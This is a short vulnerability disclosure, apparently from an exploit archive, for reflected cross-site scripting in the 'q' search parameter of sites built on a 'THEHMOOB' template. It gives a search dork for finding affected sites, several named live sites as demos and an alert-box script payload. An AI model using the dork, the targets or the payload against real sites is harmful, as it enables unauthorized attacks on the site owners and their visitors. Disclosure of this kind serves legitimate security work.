THEHMOOB Crose-Site-Scripting

2016.10.01

Equ1n0x (AZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: inurl:.php?id= intext:"MADE BY THEHMOOB"

##########################################
# #
# E Q U 1 N 0 X #
# #
##########################################
______________________________________________________________
#Exploit Title: THEHMOOB Crose-Site-Scripting
#Exploit Dork: inurl:.php?id= intext:"MADE BY THEHMOOB"
#Exploit Author: Equ1n0x
#Tested On: Chrome
_______________________________________________________________
#DEMO
_______________________________________________________________
[+] https://modernhmong.com/search.php?q=
[+]http://fujiyoutube.com/search.php?q=
[+]http://79tube.com/search.php?q=
[+]http://www.topyoutubemp3.com/search.php?q=
[+]http://video.hmongcam.com/search.php?q=
[+] And More..
______________________________________________________________
Details:
__________________________________________________________________
#Vuln Parametrs "q"
#Payload: <script>alert('CroseSiteScripting')</script>
__________________________________________________________________
#Contact:redkit277@gmail.com
__________________________________________________________________

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

THEHMOOB Crose-Site-Scripting

Dork: inurl:.php?id= intext:"MADE BY THEHMOOB"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.